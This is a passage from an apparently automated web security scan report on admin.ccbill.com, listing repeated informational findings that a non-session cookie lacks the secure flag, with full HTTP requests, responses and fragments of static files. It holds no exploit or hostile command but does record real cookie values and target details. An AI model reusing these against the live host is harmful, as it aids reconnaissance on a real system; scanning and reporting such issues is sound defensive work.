User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Fri, 09 Jan 2009 19:53:24 GMT
ETag: "1680716-8c06-460121c1a3500"
Accept-Ranges: bytes
Content-Length: 35846
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

Ext={version:"2.2"};window["undefined"]=window["undefined"];Ext.app
...[SNIP]...

7.6. https://admin.ccbill.com/ext-2.2/custom/combos.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/custom/combos.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/custom/combos.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Wed, 10 Dec 2008 00:38:55 GMT
ETag: "1680888-25e-45da67c1be5c0"
Accept-Ranges: bytes
Content-Length: 606
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/


.search-item {
font:normal 11px tahoma, arial, helvetica, sa
...[SNIP]...

7.7. https://admin.ccbill.com/ext-2.2/custom/login.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/custom/login.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/custom/login.js?26 HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:00 GMT
ETag: "41152-20f8-4933d7f027c00"
Accept-Ranges: bytes
Content-Length: 8440
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

var login;
var loginType;
Ext.namespace('Ext.loginstore');

Ext.loginstore.loginType = [
['-select one-'],
['Client'],
['Affiliate']
];

var alertBox;
var alertText
...[SNIP]...

7.8. https://admin.ccbill.com/ext-2.2/custom/password.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/custom/password.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/custom/password.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:01 GMT
ETag: "57f36b-2bca-4933d7f11be40"
Accept-Ranges: bytes
Content-Length: 11210
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

var passwordWindow;
var msgWindow;
var windowType = 'lost'; //default window type

var accountType2;
var selectedOption = 'email';
var megamenus = (window.location.href.match(/(loginMM|megamenus)/
...[SNIP]...

7.9. https://admin.ccbill.com/ext-2.2/ext-all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/ext-all.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/ext-all.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:56 GMT
Last-Modified: Mon, 22 Dec 2008 23:37:29 GMT
ETag: "420aac-83c49-45eab2457e040"
Accept-Ranges: bytes
Content-Length: 539721
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

Ext.DomHelper=function(){var L=null;var F=/^(?:br|frame|hr|img|inpu
...[SNIP]...

7.10. https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/css/ext-all.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/css/ext-all.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Fri, 09 Jan 2009 18:46:28 GMT
ETag: "5807b8-142ac-460112cbae900"
Accept-Ranges: bytes
Content-Length: 82604
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
* Ext JS Library 2.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

html,body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset
...[SNIP]...

7.11. https://admin.ccbill.com/ext-2.2/resources/images/default/button/btn-sprite.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/button/btn-sprite.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/button/btn-sprite.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:01 GMT
Last-Modified: Fri, 09 Jan 2009 18:48:12 GMT
ETag: "40a3b-53d-4601132edd300"
Accept-Ranges: bytes
Content-Length: 1341
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a........<t.M~%W.Hn.Jq.U}.@.@f..g..j..l..z..{..}....o..q.....0..0..5..5..5..;..:..;..;..G..I..A..B..A..H..I..I..I..P..Q..P..X..X..Y..a..a..`..j..i..r..q..r..z..y..z...............................
...[SNIP]...

7.12. https://admin.ccbill.com/ext-2.2/resources/images/default/form/text-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/form/text-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/form/text-bg.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Fri, 09 Jan 2009 18:53:28 GMT
ETag: "168094c-333-4601145c39a00"
Accept-Ranges: bytes
Content-Length: 819
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

7.13. https://admin.ccbill.com/ext-2.2/resources/images/default/form/trigger.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/form/trigger.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/form/trigger.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Fri, 09 Jan 2009 18:53:28 GMT
ETag: "409a3-718-4601145c39a00"
Accept-Ranges: bytes
Content-Length: 1816
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89af......1P.3Q.2R.3R.4S.5S.5S.5T.5T.@.@~............................................................................................................................................................
...[SNIP]...

7.14. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-c.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/shadow-c.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/shadow-c.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=37461042.1893489909.1310491136.1310491136.1310491136.1; __utmb=37461042.8.10.1310491136; __utmc=37461042; __utmz=37461042.1310491136.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:22:18 GMT
Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT
ETag: "420e24-76-460113151d640"
Accept-Ranges: bytes
Content-Length: 118
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

.PNG
.
...IHDR..............o&.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.bd``.`@.L.X..........BS.......IEND.B`.

7.15. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow-lr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/shadow-lr.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/shadow-lr.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=37461042.1893489909.1310491136.1310491136.1310491136.1; __utmb=37461042.8.10.1310491136; __utmc=37461042; __utmz=37461042.1310491136.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:22:18 GMT
Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT
ETag: "5808aa-87-460113151d640"
Accept-Ranges: bytes
Content-Length: 135
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

.PNG
.
...IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...)IDATx.bd``..bn ... >.....@..J.`b ........-...o......IEND.B`.

7.16. https://admin.ccbill.com/ext-2.2/resources/images/default/shadow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /ext-2.2/resources/images/default/shadow.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ext-2.2/resources/images/default/shadow.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=37461042.1893489909.1310491136.1310491136.1310491136.1; __utmb=37461042.8.10.1310491136; __utmc=37461042; __utmz=37461042.1310491136.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:22:18 GMT
Last-Modified: Fri, 09 Jan 2009 18:47:45 GMT
ETag: "16809de-137-460113151d640"
Accept-Ranges: bytes
Content-Length: 311
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=d8effb4a9a94a547d2f323cce435bf5d7c73dbe3b95e9a8f4e1c82b7; Path=/

.PNG
.
...IHDR.......0.....2.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...=..0..[PAQ..`......    ......
...^..#a.&...C..H.s.
....#&C... 1.R...D...."!caJ..)..3!S..n.Y8
..!v.H....EE.x.X..,4.5.Bh..
...[SNIP]...

7.17. https://admin.ccbill.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:17 GMT
Last-Modified: Thu, 28 Jun 2007 17:58:59 GMT
ETag: "c9e92-1-433fb1df13ec0"
Accept-Ranges: bytes
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/



7.18. https://admin.ccbill.com/images/ccb_AffiliateSystemBanner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_AffiliateSystemBanner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_AffiliateSystemBanner.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:40 GMT
ETag: "3070d-d48-48f3a34968f00"
Accept-Ranges: bytes
Content-Length: 3400
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89al.Q..........\{.............nps...s..
..............z..............PQShj................'')o.....................................7Sn...Sh}...............^_a..................?@C......~.........
...[SNIP]...

7.19. https://admin.ccbill.com/images/ccb_AffiliateSystemBkg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_AffiliateSystemBkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_AffiliateSystemBkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "57ea2-5b9-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1465
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

7.20. https://admin.ccbill.com/images/ccb_ClientSupportAreaBkg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_ClientSupportAreaBkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_ClientSupportAreaBkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:04 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680fa4-af0-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 2800
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

7.21. https://admin.ccbill.com/images/ccb_LearnMoreBtn.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LearnMoreBtn.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LearnMoreBtn.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
